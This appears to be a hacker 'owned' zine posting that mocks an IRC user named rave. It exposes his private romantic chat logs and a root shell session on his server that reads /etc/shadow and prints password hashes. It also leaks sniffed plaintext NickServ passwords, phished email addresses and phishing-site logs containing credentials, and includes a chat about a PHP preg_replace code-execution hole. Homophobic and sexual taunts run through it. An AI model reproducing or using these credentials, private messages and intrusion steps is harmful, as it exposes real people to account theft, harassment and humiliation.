17 23:04:24 rave come here you sexy ! Sep 17 23:04:35 styx awww lol Sep 17 23:04:44 styx i meant it :) Sep 17 23:04:56 rave yes aww thank you so much Sep 17 23:05:04 rave ty ty ty Kisssssssssssssssssssssssss Sep 17 23:05:23 styx u dont need to thank me, just carry on being u thats all i want :D Sep 17 23:05:27 styx :* Sep 17 23:05:38 rave the same for you, In atleast that you tryed to make it work Sep 17 23:05:52 rave since your age is mutch higher then mine Sep 17 23:06:02 styx age doesnt matter Sep 17 23:06:16 styx im only 8 yrs older Sep 17 23:06:20 rave some like to think so Sep 17 23:06:21 styx i think lol Sep 17 23:06:35 styx but Sep 17 23:07:07 styx u said 'i tryed to make it work', does that mean thats it? Sep 17 23:07:30 rave nooooooooooo Sep 17 23:07:53 rave with you letting me in we could not ever start to make it work Sep 17 23:08:01 rave and now i dont want to let yo go Sep 17 23:08:14 styx let me go? Sep 17 23:08:18 rave yeah Sep 17 23:08:21 styx why Sep 17 23:08:36 rave dont go thats what i sayed :D Sep 17 23:08:53 styx oh Sep 17 23:08:56 rave because i got the hots for you :D i want you around me all the time Sep 17 23:09:04 styx thats cool Sep 17 23:09:06 styx :D Sep 17 23:09:36 styx wanna skype? Sep 17 23:09:37 rave your super sweet to me, and you give me this special feeling like i never realy felt like Sep 17 23:09:52 styx u too rave Sep 17 23:10:01 rave no not yet im still warming up :D Sep 17 23:10:14 rave i wanna say sweet things to you Sep 17 23:10:47 styx :) Sep 17 23:11:17 * rave closes his eyes and daydreams about you Sep 17 23:11:24 rave you are here with me Sep 17 23:11:28 styx ok my music is gonna be turned up for a while then :) Sep 17 23:11:31 rave right next to me Sep 17 23:11:42 styx i wish i was :( Sep 17 23:11:56 rave and we are all alone and your just sitting there Sep 17 23:12:09 rave looking @ me with these eyes turned to love mode Sep 17 23:12:19 rave and im basicly do the same Sep 17 23:12:25 styx rave Sep 17 23:12:31 styx dont do that lol Sep 17 23:12:57 rave i cant help day dreaming about you Sep 17 23:14:34 rave :) ... Sep 18 00:49:00 styx can u come over? like in the next 30mins? Sep 18 00:49:03 styx :D Sep 18 00:49:21 rave then what ? even my car isnt that fast lol Sep 18 00:49:36 rave you have plans for a romantic night together ? Sep 18 00:49:41 styx i just want u here to hug thats all Sep 18 00:49:51 styx nothing more, or less Sep 18 00:50:05 styx i just wanna snuggle up to u Sep 18 00:50:06 rave i want the same sooo badly Sep 18 00:50:17 rave yeah i want to hold you girl Sep 18 00:50:29 rave and tell you what i feel for you Sep 18 00:50:48 styx i want that too Sep 18 00:51:25 rave yeah Sep 18 00:51:35 rave infact its my only dream right now Sep 18 00:51:46 rave just to touch you Sep 18 00:51:54 rave and see if im not dreaming Sep 18 00:52:02 rave if this is for real Sep 18 00:52:10 rave and then grep you and hug you Sep 18 00:53:14 styx i need to wrap up warm rave Sep 18 00:53:33 rave well then come in my arms girl Sep 18 00:53:54 rave mmm i would almost kill for that momend Sep 18 00:54:21 styx rave i would love to come into your arms right now Sep 18 00:54:37 styx to be so warm and snug Sep 18 00:55:02 rave ow yes Sep 18 00:55:15 rave i would have a big smile on my face Sep 18 00:55:23 styx me too Sep 18 00:55:24 rave like as big as mine is now Sep 18 00:55:33 rave just because i would feel soo happy Sep 18 00:56:20 rave your a thief ..... you stole my litle heart Sep 18 00:57:07 styx im sooooooo tired tho :( Sep 18 00:57:18 styx i wanna snuggle dammit Sep 18 00:57:31 rave yeah :( ... Sep 24 23:21:23 rave Styx i want to say im sorry Sep 24 23:45:00 styx what for? Sep 24 23:45:37 rave for what i sayed in #rosiello Sep 24 23:47:09 styx yeah well i have never been looked on as a slut before, but i reckon seeing that before i went to work made me feel bad Sep 24 23:47:35 rave you are no slut Sep 24 23:47:55 styx i felt like it infront of #rosiello Sep 24 23:47:56 rave your the best girl in this world and im the ass hole Sep 24 23:48:09 rave they dont know who that girl is Sep 24 23:48:21 styx yeah they did Sep 24 23:48:32 styx but still Sep 24 23:48:48 rave i feel realy bad Sep 24 23:49:09 styx i love u in all the world Sep 24 23:49:15 rave realy realy bad Sep 24 23:49:23 rave and like i sayed Sep 24 23:49:39 rave i got scared when i did read it Sep 24 23:50:02 rave i didnt even knew i sayed it Sep 24 23:50:11 styx i got upset at like 4 in the morning Sep 24 23:50:19 styx i dunno Sep 24 23:50:27 rave own god :( Sep 24 23:50:41 styx its like i dunno Sep 24 23:50:52 styx the whole chan knew Sep 24 23:51:11 styx and sex isnt the only thing Sep 24 23:51:16 styx i told u that Sep 24 23:51:27 styx i thought u felt the same Sep 24 23:51:28 rave and i told you the same Sep 24 23:51:52 rave do you see me as a sex maniac ? Sep 24 23:52:15 styx i see u as someone that will openly tell ppl im wet :/ ... Sep 25 16:30:20 rave i kiss only you my love Sep 25 16:30:27 styx :P Sep 25 16:30:52 rave bye bye Sep 25 16:30:56 styx bye :D Sep 25 16:55:20 styx i miss you :( Sep 25 16:57:02 rave hi princess Sep 25 16:57:08 styx :D Sep 25 16:57:10 styx wb :P Sep 25 16:57:36 rave :D Sep 25 16:57:41 rave i mised you to Sep 25 16:57:49 styx how was your shower? Sep 25 16:57:52 rave when i realaliced i wass kissing air Sep 25 16:57:57 styx lol Sep 25 16:57:58 rave fine fine Sep 25 16:58:56 styx so what do u have planned for today? Sep 25 16:59:12 rave nothing but my n1 prio was seeing you :) Sep 25 16:59:20 styx aww :) Sep 25 16:59:28 rave yeah Sep 25 16:59:42 styx well i dont have to be at work early tomorrow, so i can stay up late :D Sep 25 16:59:50 rave same here Sep 25 17:00:14 styx i have an 8am start instead of 5am, much more reasonable :P Sep 25 17:00:36 rave i have to start @ 8 as well :) Sep 25 17:00:41 styx :) Sep 25 17:01:11 rave i wish you where with me in the shower Sep 25 17:01:28 styx yeah me too, would have been nice Sep 25 17:01:56 rave verry nice yes :D i have tought about t 2 in the shower Sep 25 17:02:04 rave didnt leave me cold Sep 25 17:02:10 styx :) Sep 25 17:02:26 rave :D ur still looking @ me ? Sep 25 17:02:32 styx yeah :D Sep 25 17:02:36 styx i like what i see too Sep 25 17:02:38 styx :P Sep 25 17:02:41 rave awwww Sep 25 17:02:57 rave your so sweet to me Sep 25 17:03:15 styx and you to me :P Sep 25 17:03:47 rave im your man my love :) your deticated man for beter or wurse Sep 25 17:03:55 styx :D Sep 25 17:04:04 rave :* Sep 25 17:04:08 styx :* Sep 25 17:04:44 styx awww :D Sep 25 17:06:33 rave im daydreaming Sep 25 17:06:48 styx :D Sep 25 17:06:52 styx what about? Sep 25 17:07:07 rave who else or what else then you princess Sep 25 17:07:13 styx :P Sep 25 17:09:06 rave im dreaming about dancing with you slowly on a love song, holding you verry close to me Sep 25 17:09:18 rave and i look in your eyes and we start to kiss Sep 25 17:09:34 styx aww i have a very warm feeling :) Sep 25 17:09:52 rave hehe me 2 aldo its freezing here Sep 25 17:10:19 rave dream with me this dream i can have it all day. I can hear the music already Sep 25 17:10:51 styx :) Sep 25 17:11:19 rave :D wow and we are all alone because we forgot the rest of the world Sep 25 17:12:08 styx i forget the rest of the world everytime i think of you Sep 25 17:12:38 rave aww girl that brought a tear to my eye Sep 25 17:12:53 styx :) Sep 25 17:13:09 rave :D :* Sep 25 17:13:13 styx :* Sep 25 17:13:31 rave im in love with a princess and an angel in the same time Sep 25 17:13:39 styx awww :) Sep 25 17:14:02 styx and im in love with such a kind, loving, goodlooking man :D Sep 25 17:14:33 rave i love it when you say "im in love" Sep 25 17:14:39 rave makes me feel all warm in side Sep 25 17:14:47 styx :D Sep 25 17:14:59 styx good cause the love i have for u makes me warm also Sep 25 17:15:25 rave im in love sooooooo mutch Sep 25 17:15:56 styx :D Sep 25 17:16:22 rave i wonder how strong my network would be in my bed ... ...GET READY... ... Sep 08 23:27:31 rave ur staight ? Sep 08 23:27:44 styx straight? Sep 08 23:27:50 rave yeah Sep 08 23:27:55 styx er yeah lol Sep 08 23:28:05 rave im still wondering about you Sep 08 23:28:13 styx why :/ Sep 08 23:28:18 rave i tought maybe if ur lesbian Sep 08 23:28:27 rave your the male type of both Sep 08 23:28:29 styx rofl nah your ok Sep 08 23:28:34 rave that would explain a lot Sep 08 23:28:40 styx im straight Sep 08 23:28:41 styx :P Sep 08 23:28:58 rave im not Sep 08 23:29:06 styx thats cool Sep 08 23:29:08 styx :) Sep 08 23:29:18 rave im bi sexual ... BUHAHHAHAHAHAHAHHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHHAHAHAHAHAHAHAHAA!@#!%$!@!! -~-~-~ THIS LOG IS ALL FAKED. RAVE HAVE NEVER BEEN OWNED! N3V3R B33N 0WN3D!! th3z3 r0s13ll0 fuqz c0d3 m0r3 p0c th4n c0ntex 4ft3r p4tch tu3zd4y. l4m3rz. N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! B1S3XU4L! N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! T4K3Z 1T UP TH3 4ZZ! N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! DUMP3D BY H1Z 30+ YR 0LD 0NL1N3 GF! N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! C0DEZ A FTPD M0R3 1NS3CUR3 TH4N PUREFPTD! N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! root@alpha:~# ls -al /home total 48 drwxrwsr-x 12 root staff 4096 Dec 11 19:39 . drwxr-xr-x 24 root root 4096 Oct 24 15:56 .. drwxr-s--x 25 amanda users 4096 Apr 12 00:20 amanda drwxrwsr-x 7 anope users 4096 Apr 16 11:42 anope drwxr-sr-x 6 cold users 4096 Apr 16 02:32 cold drwxr-sr-x 3 root staff 4096 Nov 19 15:23 cvsweb drwxr-sr-x 2 root staff 4096 Nov 19 15:57 dylan drwxr-sr-x 3 extreme users 4096 Sep 5 2005 extreme drwxr-sr-x 2 root nogroup 4096 Aug 29 2005 ftp drwxr-sr-x 4 infobot users 4096 Feb 7 17:07 infobot drwxr-sr-x 2 root staff 4096 Aug 20 2005 jmoschetti45 drwxrwxrwx 10 rave rave 4096 Mar 11 15:15 rave root@alpha:~# ls -al /home/rave total 460 drwxrwxrwx 10 rave rave 4096 Mar 11 15:15 . drwxrwsr-x 12 root staff 4096 Dec 11 19:39 .. -rw------- 1 rave rave 90 Mar 11 12:09 .bash_history -rw-r--r-- 1 rave rave 567 Aug 19 2005 .bash_profile -rw-r--r-- 1 rave rave 1834 Aug 19 2005 .bashrc drwxr-xr-x 2 root root 4096 Nov 20 20:53 CVS drwxr-xr-x 7 root root 4096 Aug 21 2005 cvsroot -rw-rw-rw- 1 rave rave 0 Oct 7 2005 ftpT9vlAu drwxr-xr-x 3 root root 4096 Aug 21 2005 home -rwxr-xr-x 1 root root 318 Aug 22 2005 ip drwxr-xr-x 8 root root 4096 Mar 11 15:17 jatx -rw-r--r-- 1 root root 409600 Nov 20 20:57 jatx-0.1.tar drwxr-xr-x 2 root root 4096 Mar 11 12:56 project drwxr-xr-x 8 root root 4096 Dec 13 18:16 rave@192.168.0.10 drwxr-xr-x 9 www-data www-data 4096 Mar 11 15:19 svn drwxr-xr-x 2 root root 4096 Mar 11 12:56 trunk root@alpha:~# ls -al /home/rave/cvsroot/anIRCD total 400 drwxr-xr-x 4 root root 4096 Aug 21 2005 . drwxr-xr-x 7 root root 4096 Aug 21 2005 .. -r--r--r-- 1 root root 406 Aug 21 2005 AUTHORS,v -r--r--r-- 1 root root 18382 Aug 21 2005 COPYING,v -r--r--r-- 1 root root 373 Aug 21 2005 ChangeLog,v -r--r--r-- 1 root root 10541 Aug 21 2005 Doxyfile,v -r--r--r-- 1 root root 7343 Aug 21 2005 INSTALL,v -r--r--r-- 1 root root 519 Aug 21 2005 Makefile.am,v -r--r--r-- 1 root root 434 Aug 21 2005 Makefile.cvs,v -r--r--r-- 1 root root 373 Aug 21 2005 NEWS,v -r--r--r-- 1 root root 373 Aug 21 2005 README,v -r--r--r-- 1 root root 373 Aug 21 2005 TODO,v -r--r--r-- 1 root root 6805 Aug 21 2005 anircd.kdevelop,v -r--r--r-- 1 root root 1039 Aug 21 2005 anircd.kdevelop.pcs,v -r--r--r-- 1 root root 1033 Aug 21 2005 anircd.kdevses,v -r-xr-xr-x 1 root root 40306 Aug 21 2005 config.guess,v -r-xr-xr-x 1 root root 30003 Aug 21 2005 config.sub,v -r--r--r-- 1 root root 525 Aug 21 2005 configure.in,v -r-xr-xr-x 1 root root 13325 Aug 21 2005 depcomp,v -r-xr-xr-x 1 root root 6694 Aug 21 2005 install-sh,v -r--r--r-- 1 root root 182738 Aug 21 2005 ltmain.sh,v -r-xr-xr-x 1 root root 10651 Aug 21 2005 missing,v -r-xr-xr-x 1 root root 2364 Aug 21 2005 mkinstalldirs,v drwxr-xr-x 3 root root 4096 Aug 21 2005 src drwxr-xr-x 2 root root 4096 Aug 21 2005 templates root@alpha:~# ls -al /home/rave/home/rave total 744 drwxr-xr-x 25 root root 4096 Aug 21 2005 . drwxr-xr-x 3 root root 4096 Aug 21 2005 .. lrwxrwxrwx 1 root root 45 Aug 21 2005 .DCOPserver_debian.rosiello.net_:0 -> /home/rave/.DCOPserver_debian.rosiello.net__0 -rw-r--r-- 1 root root 66 Aug 21 2005 .DCOPserver_debian.rosiello.net__0 -rw------- 1 root root 1174 Aug 21 2005 .ICEauthority -rw------- 1 root root 191 Aug 21 2005 .Xauthority -rw------- 1 root root 5758 Aug 21 2005 .bash_history -rw-r--r-- 1 root root 704 Aug 21 2005 .bash_profile -rw-r--r-- 1 root root 1290 Aug 21 2005 .bashrc -rw------- 1 root root 22 Aug 21 2005 .dmrc drwxr-xr-x 3 root root 4096 Aug 21 2005 .evolution -rw-r--r-- 1 root root 563794 Aug 21 2005 .fonts.cache-1 drwx------ 4 root root 4096 Aug 21 2005 .gaim drwx------ 4 root root 4096 Aug 21 2005 .gconf drwx------ 2 root root 4096 Aug 21 2005 .gconfd -rw-r----- 1 root root 0 Aug 21 2005 .gksu.lock drwx------ 3 root root 4096 Aug 21 2005 .gnome drwx------ 9 root root 4096 Aug 21 2005 .gnome2 drwx------ 2 root root 4096 Aug 21 2005 .gnome2_private drwxr-xr-x 3 root root 4096 Aug 21 2005 .gnupg drwxr-xr-x 2 root root 4096 Aug 21 2005 .gstreamer-0.8 -rw-r--r-- 1 root root 86 Aug 21 2005 .gtkrc-1.2-gnome2 drwx------ 4 root root 4096 Aug 21 2005 .kde drwxr-xr-x 3 root root 4096 Aug 21 2005 .mcop -rw------- 1 root root 31 Aug 21 2005 .mcoprc drwx------ 3 root root 4096 Aug 21 2005 .metacity drwx------ 3 root root 4096 Aug 21 2005 .mozilla -rw------- 1 root root 7 Aug 21 2005 .nano_history drwxr-xr-x 3 root root 4096 Aug 21 2005 .nautilus drwxr-xr-x 2 root root 4096 Aug 21 2005 .qt -rw------- 1 root root 0 Aug 21 2005 .recently-used drwx------ 2 root root 4096 Aug 21 2005 .ssh drwx------ 3 root root 4096 Aug 21 2005 .xchat2 drwxr-xr-x 4 root root 4096 Aug 21 2005 .xmms -rw-r--r-- 1 root root 2053 Aug 21 2005 .xsession-errors -rw-r--r-- 1 root root 7920 Aug 21 2005 1077606958.gif drwxr-xr-x 3 root root 4096 Aug 21 2005 Desktop drwx------ 7 root root 4096 Aug 21 2005 Mail drwxr-xr-x 2 root root 4096 Aug 21 2005 bin drwxr-xr-x 7 root root 4096 Aug 21 2005 cvsroot -rwxr-xr-x 1 root root 13 Aug 21 2005 echo drwxr-xr-x 8 root root 4096 Sep 8 2005 extreme -rw-r--r-- 1 root root 74 Aug 21 2005 gpg-agent-info -rw------- 1 root root 13449 Aug 21 2005 mbox -rw-r--r-- 1 root root 96 Aug 21 2005 text.gpg -rwxr-xr-x 1 root root 32 Aug 21 2005 vuln.sh root@alpha:~# ls -al /home/rave/home/rave/.gaim: total 64 drwx------ 4 root root 4096 Aug 21 2005 . drwxr-xr-x 25 root root 4096 Aug 21 2005 .. -rw-r--r-- 1 root root 4085 Aug 21 2005 accels -rw------- 1 root root 556 Aug 21 2005 accounts.xml -rw------- 1 root root 27509 Aug 21 2005 blist.xml drwx------ 2 root root 4096 Aug 21 2005 icons -rw------- 1 root root 10370 Aug 21 2005 prefs.xml drwx------ 2 root root 4096 Aug 21 2005 smileys root@alpha:~# cat /home/cold/.ssh/known_hosts vortex.labs.pulltheplug.org,69.55.233.82 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4xKkjMPQ0oMFFyPNrrQf/AhankBHrBcrww2YL9YfDXMpUGafiGvs0yqVCWhLWAT2QcY4Olya3K9ykPDfRJ8PxI1YYikGuSkRjFF/yElP+HAXnMPKEkrtk46wTMMDE7s5yxquFAsHzhER7wActYnhWNAmjAPtbtKxzLRdcvDW17k= root@alpha:~# cat /home/rave/home/rave/.ssh/known_hosts 192.168.0.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAoye+bhVXvF43qGdeFdPMZ2S7tEI+K258IkvqBPNOCUVkRxtpgbW015VQnVmUYSTOWr5tCkWJtNq34Jm9xgm0XJalBQfKpbkbvuvE6z88xDdveaDP6ELndsqCk7RsBTXmQemnuvzmfp881yGEQR8hcyK0eKccd0vYJAmx5uJpuxc= war.swehack.se,213.80.38.17 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0c4J26RarVFEXwqio2Fvs3smJgMgWgTdXzoNVwhuB4bU6ebdI/54VGYPObuq5cBT/PFmj1Scf7Vtc7isGKtMHX+4Eo+jrwxJJ6RkGaWcAZd2h9IUOit8uPDT1oC3j65MZZZnj4dAnJDABBogNde/i6pJcStLbWoJ4Dnohy2ZEXE= root@alpha:~# cat /irc.logger.HAHHA\@y0u\ guyz Ignite -> NICKSERV : IDENTIFY verbatim namElEz -> NICKSERV : IDENTIFY fobia37 rs -> nickserv : identify mindnet jmos45 -> NICKSERV : IDENTIFY athena0814 rs -> nickserv : identify mindnet rs -> nickserv : identify mindnet rs -> rs : l0giz-g00d rs -> rs : l0giz-g00d IdleRPG -> NickServ : identify athena0814 IdleRPG -> ChanServ : op #idlerpg IdleRPG uranther -> nickserv : identify av8idas petroleum -> NickServ : identify iamanalien plex0r -> NICKSERV : IDENTIFY wtfmates morning_wood -> nickserv : identify qazwsx rs -> nickserv : identify mindnet namElEz -> NICKSERV : IDENTIFY fobia37 jmos45 -> NICKSERV : IDENTIFY athena0814 IdleRPG -> NickServ : identify athena0814 IdleRPG -> ChanServ : op #idlerpg IdleRPG rs -> nickserv : identify mindnet RAZ3R -> nickserv : identify red1988 Dr4g -> NICKSERV : IDENTIFY 1237896540 htek -> nickserv : identify ketrone Joe -> NICKSERV : IDENTIFY athena0814 Joe -> NICKSERV : IDENTIFY athena0814 Dr4g -> NICKSERV : IDENTIFY 1237896540 Ignite -> NICKSERV : IDENTIFY verbatim rave -> NICKSERV : IDENTIFY blabla rave -> nickserv : help htek -> nickserv : identify ketrone Proxy -> NICKSERV : IDENTIFY 041187jamie Animal -> nickserv : identify iamtheking rs -> nickserv : identify mindnet rs -> rs : test jmoschetti45 -> NICKSERV : IDENTIFY athena0814 Dr4g -> NICKSERV : IDENTIFY 1237896540 Seadog -> NICKSERV : IDENTIFY devcplusplus jmoschetti45 -> NICKSERV : IDENTIFY athena0814 Seadog -> NICKSERV : IDENTIFY devcplusplus jmoschetti45 -> NICKSERV : IDENTIFY athena0814 rs -> nickserv : identify mindnet Seadog -> NICKSERV : IDENTIFY devcplusplus goldnlink -> nickserv : identify Qbk2BnYN rave -> NICKSERV : IDENTIFY blabla Ignite -> NICKSERV : IDENTIFY verbatim Seadog -> NICKSERV : IDENTIFY devcplusplus jmoschetti45 -> NICKSERV : IDENTIFY athena0814 dlab -> nickserv : help dlab -> nickserv : identify IDontTrustYou Dr4g -> chanserv : sop #dhell add petroleum Dr4g -> chanserv : sop #dhell add rave petroleum -> NickServ : identify iamanalien Megahertz -> NICKSERV : IDENTIFY dhellsucks Dr4g -> NICKSERV : IDENTIFY 1237896540 Ignite -> NICKSERV : IDENTIFY verbatim RAZ3R -> nickserv : identify red1988 Megahertz -> NICKSERV : IDENTIFY dhellsucks jmoschetti45 -> NICKSERV : IDENTIFY athena0814 Dr4g_ -> NICKSERV : IDENTIFY 1237896540 caffeine24 -> NickServ : identify 041482ch Megahertz -> NICKSERV : IDENTIFY dhellsucks rs -> nickserv : identify mindnet tgo -> IceShaman : why IceShaman -> tgo : there's a 0day for IPB, code execdution, and I'm trying to find it IceShaman -> tgo : I'm trying every trick in the book IceShaman -> tgo : and I can only find small issues tgo -> IceShaman : hmm tgo -> IceShaman : not that template thing right? tgo -> IceShaman : that was fake IceShaman -> tgo : what template thing? IceShaman -> tgo : no this is real IceShaman -> tgo : someone used it on CS.net CcSsNET -> CcSsNET : LC 1145380800.97560 IceShaman -> tgo : oh the template thing IceShaman -> tgo : OutThere made IceShaman -> tgo : nah, I knew what that was IceShaman -> tgo : this is real IceShaman -> tgo : I've found 2 issues IceShaman -> tgo : one IceShaman -> tgo : [sql]VAR_NAME[/sql] IceShaman -> tgo : allows you to read variables IceShaman -> tgo : due to the e modifier being in a preg_replace IceShaman -> tgo : [sql]txt[/sql] IceShaman -> tgo : gives you back your post with formatting IceShaman -> tgo : only works when you edit the post CcSsNET -> CcSsNET : LC 1145380860.36818 IceShaman -> tgo : but you cant call functions or use $var->any->of->this IceShaman -> tgo : the second is you can change the path of a file being included IceShaman -> tgo : but it's in a script only accessible to admins tgo -> IceShaman : so the string gets passed ot eval or what? IceShaman -> tgo : and you'd need register globals on IceShaman -> tgo : tgo, no IceShaman -> tgo : preg_replace(//e CcSsNET -> CcSsNET : LC 1145380920.53562 IceShaman -> tgo : the e modifier makes the replacement get parsed as PHP IceShaman -> tgo : so if you use \\2 IceShaman -> tgo : for a backreference IceShaman -> tgo : the backreference gets parsed IceShaman -> tgo : but it only allows vars IceShaman -> tgo : if it had a $var in the replacement IceShaman -> tgo : you had access to IceShaman -> tgo : you'd be in business IceShaman -> tgo : or if \\2 wasnt already in a function IceShaman -> tgo : but this sploit is in IPB CcSsNET -> CcSsNET : LC 1145380980.72563 IceShaman -> tgo : it allows remote code execution IceShaman -> tgo : and I can't fucking find it IceShaman -> tgo : it at least allows you to read/write to files IceShaman -> tgo : I've checked the entire IPB source IceShaman -> tgo : for require/include s IceShaman -> tgo : and gone through all of them IceShaman -> tgo : I've checked all the preg_replaces CcSsNET -> CcSsNET : LC 1145381040.04560 IceShaman -> tgo : checked all eval() assert() IceShaman -> tgo : checked for system() exec() shell_exec() passthru() etc CcSsNET -> CcSsNET : LC 1145381100.72560 CcSsNET -> CcSsNET : LC 1145381160.14562 tgo -> IceShaman : wtf tgo -> IceShaman : ok sorry tgo -> IceShaman : my isp keeps jumping tgo -> IceShaman : whot old you about the bug how you know it exists? IceShaman -> tgo : because someone used it IceShaman -> tgo : someone managed to write files on HTS CcSsNET -> CcSsNET : LC 1145381220.21561 IceShaman -> tgo : and they used the same thing on enigmagroup IceShaman -> tgo : I was told it was a flaw in IPB IceShaman -> tgo : some people also hacked us 2 days ago IceShaman -> tgo : saying they're the same people IceShaman -> tgo : and it's a bug in a php script IceShaman -> tgo : namely IPB IceShaman -> tgo : securicore CcSsNET -> CcSsNET : LC 1145381280.20105 IceShaman -> tgo : and as you know PHP CcSsNET -> CcSsNET : LC 1145381340.72257 IceShaman -> tgo : I thought I'd ask you if you knew any more holes IceShaman -> tgo : that could lead to remote execution tgo -> IceShaman : did you check logs? IceShaman -> tgo : he used POST tgo -> IceShaman : to what pages? IceShaman -> tgo : it isnt any of the functions used to run commands IceShaman -> tgo : tgo, no idea tgo -> IceShaman : the logs should say what pages IceShaman -> tgo : there are no logs IceShaman -> tgo : I said he used POST IceShaman -> tgo : POST isn't logged tgo -> IceShaman : apache logs?? CcSsNET -> CcSsNET : LC 1145381400.07966 IceShaman -> tgo : POST ISNT LOGGED tgo -> IceShaman : ... IceShaman -> tgo : if you post data to a form IceShaman -> tgo : it isnt logged by apache IceShaman -> tgo : this is basic stuff tgo IceShaman -> tgo : apachde only logs GET requests tgo -> IceShaman : 192.168.1.100 - tgo [14/Mar/2006:14:53:24 -0600] "POST /pMa/left.php HTTP/1.1" 200 1425 tgo -> IceShaman : 192.168.1.100 - tgo [14/Mar/2006:14:53:32 -0600] "POST /pMa/left.php HTTP/1.1" 200 1002 tgo -> IceShaman : 192.168.1.100 - tgo [14/Mar/2006:14:54:05 -0600] "POST /pMa/left.php HTTP/1.1" 200 1002 tgo -> IceShaman : 192.168.1.100 - tgo [14/Mar/2006:14:54:29 -0600] "POST /pMa/left.php HTTP/1.1" 200 1347 tgo -> IceShaman : it says the page tgo -> IceShaman : that will give you a big clue IceShaman -> tgo : oh ffs IceShaman -> tgo : no it wont CcSsNET -> CcSsNET : LC 1145381460.89561 IceShaman -> tgo : none of the data is there dude IceShaman -> tgo : it's forums IceShaman -> tgo : you any idea how many people post data an hour? CcSsNET -> CcSsNET : LC 1145381520.57948 tgo -> IceShaman : dont you have the ip of who did it tgo -> IceShaman : and idnt you say you had to have admin access? IceShaman -> tgo : I do IceShaman -> tgo : no IceShaman -> tgo : you have to have admin access IceShaman -> tgo : for a sploit I found IceShaman -> tgo : while auditing the code CcSsNET -> CcSsNET : LC 1145381580.95560 tgo -> IceShaman : ah CcSsNET -> CcSsNET : LC 1145381640.93560 CcSsNET -> CcSsNET : LC 1145381700.67653 IceShaman -> tgo : tried IPs IceShaman -> tgo : cant see any POST requests at all IceShaman -> tgo : and the gets are clean tgo -> IceShaman : hmm CcSsNET -> CcSsNET : LC 1145381760.32561 CcSsNET -> CcSsNET : LC 1145381820.81560 CcSsNET -> CcSsNET : LC 1145381880.02561 CcSsNET -> CcSsNET : LC 1145381940.38560 CcSsNET -> CcSsNET : LC 1145382000.01481 CcSsNET -> CcSsNET : LC 1145382060.08561 CcSsNET -> CcSsNET : LC 1145382120.94561 CcSsNET -> CcSsNET : LC 1145382180.60561 CcSsNET -> CcSsNET : LC 1145382240.29559 IceShaman -> tgo : nope nothing 4ft3r l1k3 4 m0nthz 0f sn1ff1ng th1z sh1t.. w3 h4v3 c0m3 t0 n0t1c3... R4V3 H4Z N0 FUQN SK1LL 1N L1F3. B4Q 2 H4QL0GZ root@alpha:~# w 08:48:53 up 70 days, 22:08, 3 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT amanda :0 - 08Feb06 ?xdm? 4days 13.71s x-session-manag root@alpha:~# cat /etc/shadow root:$1$NVk7VnVj$M0U5yPFdlz/6uNaZoKhZG0:13248:0:99999:7::: daemon:*:13014:0:99999:7::: bin:*:13014:0:99999:7::: sys:*:13014:0:99999:7::: sync:*:13014:0:99999:7::: games:*:13014:0:99999:7::: man:*:13014:0:99999:7::: lp:*:13014:0:99999:7::: mail:*:13014:0:99999:7::: news:*:13014:0:99999:7::: uucp:*:13014:0:99999:7::: proxy:*:13014:0:99999:7::: www-data:*:13014:0:99999:7::: backup:*:13014:0:99999:7::: list:*:13014:0:99999:7::: irc:*:13014:0:99999:7::: gnats:*:13014:0:99999:7::: nobody:*:13014:0:99999:7::: Debian-exim:!:13014:0:99999:7::: rave:!!:13014:0:99999:7::: identd:!:13014:0:99999:7::: sshd:!:13014:0:99999:7::: mysql:!:13015:0:99999:7::: The_mystiC:$1$2wdFYnnK$b.6Ijx98d2.i2O1z5AKp80:13015:0:99999:7::: anope:!:13015:0:99999:7::: infobot:!:13015:0:99999:7::: jmoschetti45:$1$c63T/2TL$vR/0DZREM5OlbqKhl0GxZ1:13015:0:99999:7::: saned:!:13020:0:99999:7::: gdm:!:13020:0:99999:7::: messagebus:!:13020:0:99999:7::: hal:!:13020:0:99999:7::: amanda:$1$GfvvfyoN$/7eBTzRmPNy1Zj16Jsfpt/:13020:0:99999:7::: ftp:!:13024:0:99999:7::: extreme:!:13031:0:99999:7::: bind:!:13031:0:99999:7::: cvsweb:!:13106:0:99999:7::: dylan:$1$Zk.g.LVM$B.5YF4wIe0KoecaptojHC1:13106:0:99999:7::: cvsd:!:13108:0:99999:7::: cold:$1$A7n8z05o$9sAQKI6SplM4xqKtSs6vO1:13248:0:99999:7::: svn:!:13218:0:99999:7::: root@alpha:~# exit logout Connection to rosiello.net closed. N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! RAVE IS ELITE. PM IS ELITE. N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! 09.txt -~-~-~ 3th1cz@exploits.cx dianaco@aol.com brittk653@aol.com dianejt@aol.com gordgerson@aol.com sallys7138@aol.com dianesmc@aol.com bb27588@aol.com kdailey986@aol.com dialrep@aol.com samalibu@aol.com tomcgordon@aol.com tomastate@aol.com gortman@aol.com dianehm@aol.com samanauy@aol.com diana800@aol.com pdhockey31@aol.com cluless3@aol.com pdiddy6734@aol.com th1s 1s pr3vi3w 0f 3m41l 4ddr3zz3z th3y ph1sh3d.. 66.135.213.75 - - [01/Feb/2005:01:30:55 +0200] "GET /www.paypal.com/us/cgi-bin/update.php?login_email=Stan@4Focus.com HTTP/1.1" 200 32718 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Java/1.4.1_02" 66.135.213.75 - - [01/Feb/2005:01:30:58 +0200] "GET /www.paypal.com/us/cgi-bin/update.php?login_email=Stan@4Focus.com HTTP/1.1" 200 32718 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 24.206.73.128 - - [01/Feb/2005:14:30:04 +0200] "GET /www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted] HTTP/1.1" 200 32731 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 